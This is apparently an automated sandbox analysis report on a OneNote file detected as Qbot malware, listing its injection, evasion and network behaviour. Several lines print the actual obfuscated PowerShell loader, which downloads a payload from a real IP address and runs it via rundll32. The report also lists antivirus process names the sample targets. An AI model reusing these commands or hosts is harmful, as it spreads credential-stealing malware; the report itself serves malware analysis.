Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7177 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8451 Jump to behavior
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_1000AFB9 GetSystemInfo, 15_2_1000AFB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_1000C547 FindFirstFileW,FindNextFileW, 15_2_1000C547
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_1000970D LoadLibraryA,GetProcAddress, 15_2_1000970D
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_3_02E4222E mov eax, dword ptr fs:[00000030h] 15_3_02E4222E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_693417F4 mov eax, dword ptr fs:[00000030h] 15_2_693417F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_100010A0 mov eax, dword ptr fs:[00000030h] 15_2_100010A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_100026E5 mov eax, dword ptr fs:[00000030h] 15_2_100026E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_693720E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 15_2_693720E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_693720DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 15_2_693720DC

HIPS / PFW / Operating System Protection Evasion
barindex
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\SysWOW64\backgroundTaskHost.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\backgroundTaskHost.exe base: 7C0000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\backgroundTaskHost.exe base: E61790 Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\backgroundTaskHost.exe base: 7C0000 protect: page read and write Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe $atkuf9 = '62889e73828c756c961c5a6d6c01a463'; [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('dqpazwnobybvzmyncnnldcbhmxlkrfjmut1hehznc0sncnnldcbhtff1q1j5nt1hsg5czfvnmg0kc2v0igfgzgl6swtedd1hylbtnxencnbvd2vyc2hlbgwgkg5ldy1vymply3qgc3lzdgvtlm5ldc53zwjjbgllbnqplmrvd25sb2fkzmlszsgnahr0cdovlzg3ljizni4xndyumzevmzgxotkuzgf0jywgj0m6xhbyb2dyyw1kyxrhxgdilmpwzycpow0kc2v0igfntwflm3bdpwf5yxuzdqpzzxqgyw1qdfvny0e9yvjaamuncmnhbgwgcnulmwxsmzigqzpcchjvz3jhbwrhdgfcz2iuanbnlfdpbmqncmv4axqncg=='))
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe $atkuf9 = '62889e73828c756c961c5a6d6c01a463'; [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('dqpazwnobybvzmyncnnldcbhmxlkrfjmut1hehznc0sncnnldcbhtff1q1j5nt1hsg5czfvnmg0kc2v0igfgzgl6swtedd1hylbtnxencnbvd2vyc2hlbgwgkg5ldy1vymply3qgc3lzdgvtlm5ldc53zwjjbgllbnqplmrvd25sb2fkzmlszsgnahr0cdovlzg3ljizni4xndyumzevmzgxotkuzgf0jywgj0m6xhbyb2dyyw1kyxrhxgdilmpwzycpow0kc2v0igfntwflm3bdpwf5yxuzdqpzzxqgyw1qdfvny0e9yvjaamuncmnhbgwgcnulmwxsmzigqzpcchjvz3jhbwrhdgfcz2iuanbnlfdpbmqncmv4axqncg==')) Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg==')) Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\1.cmd nd Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg'); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\gb.jpg,Wind Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\backgroundTaskHost.exe C:\Windows\SysWOW64\backgroundTaskHost.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,CoInitializeEx,Sleep, 15_2_1000169F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 15_2_10002C5E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 15_2_10012137
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 15_2_1000338F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 15_2_1000FFF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_69372030 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 15_2_69372030
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_1000B231 GetCurrentProcessId,GetLastError,GetVersionExA,GetWindowsDirectoryW, 15_2_1000B231
AV process strings found (often used to terminate AV products)
Source: rundll32.exe, 0000000F.00000003.2684414715.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdagent.exe
Source: rundll32.exe, 0000000F.00000003.2684414715.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vsserv.exe
Source: rundll32.exe, 0000000F.00000003.2684414715.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: rundll32.exe, 0000000F.00000003.2684414715.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgcsrvx.exe
Source: rundll32.exe, 0000000F.00000003.2684414715.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mcshield.exe
Source: rundll32.exe, 0000000F.00000003.2684414715.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Qbot
Source: Yara match File source: 15.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e6d518.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e6d518.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2709522277.0000000002E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Qbot
Source: Yara match File source: 15.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e6d518.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e6d518.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2709522277.0000000002E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 800800 Sample: Funds_160151.one Startdate: 07/02/2023 Architecture: WINDOWS Score: 100 61 Malicious sample detected (through community Yara rule) 2->61 63 Yara detected Qbot 2->63 65 Sigma detected: Execute DLL with spoofed extension 2->65 67 2 other signatures 2->67 9 cmd.exe 2 2->9         started        13 ONENOTE.EXE 91 501 2->13         started        15 ONENOTEM.EXE 2->15         started        process3 file4 43 C:\Users\Public\1.cmd, ASCII 9->43 dropped 77 Suspicious powershell command line found 9->77 79 Tries to download and execute files (via powershell) 9->79 17 cmd.exe 1 9->17         started        20 powershell.exe 7 9->20         started        22 conhost.exe 9->22         started        45 C:\Users\user\AppData\Local\...\00000001.bin, 386 13->45 dropped 47 C:\Users\user\AppData\...\00000001.bin (copy), 386 13->47 dropped 24 ONENOTEM.EXE 3 13->24         started        signatures5 process6 signatures7 55 Suspicious powershell command line found 17->55 57 Tries to download and execute files (via powershell) 17->57 26 rundll32.exe 17->26         started        28 powershell.exe 14 16 17->28         started        32 conhost.exe 17->32         started        59 Powershell drops PE file 20->59 process8 dnsIp9 34 rundll32.exe 1 26->34         started        53 87.236.146.31, 49801, 80 EXCELLGB United Kingdom 28->53 49 C:\ProgramData\gb.jpg, PE32 28->49 dropped file10 process11 file12 41 C:\Users\user\AppData\Local\...\e77242d6.dll, PE32 34->41 dropped 69 DLL reload attack detected 34->69 71 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 34->71 73 Writes to foreign memory regions 34->73 75 3 other signatures 34->75 38 backgroundTaskHost.exe 8 15 34->38         started        signatures13 process14 dnsIp15 51 197.0.104.172, 443, 49835 TOPNETTN Tunisia 38->51
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
87.236.146.31
 unknown United Kingdom
8530 EXCELLGB true
197.0.104.172
 unknown Tunisia
37705 TOPNETTN false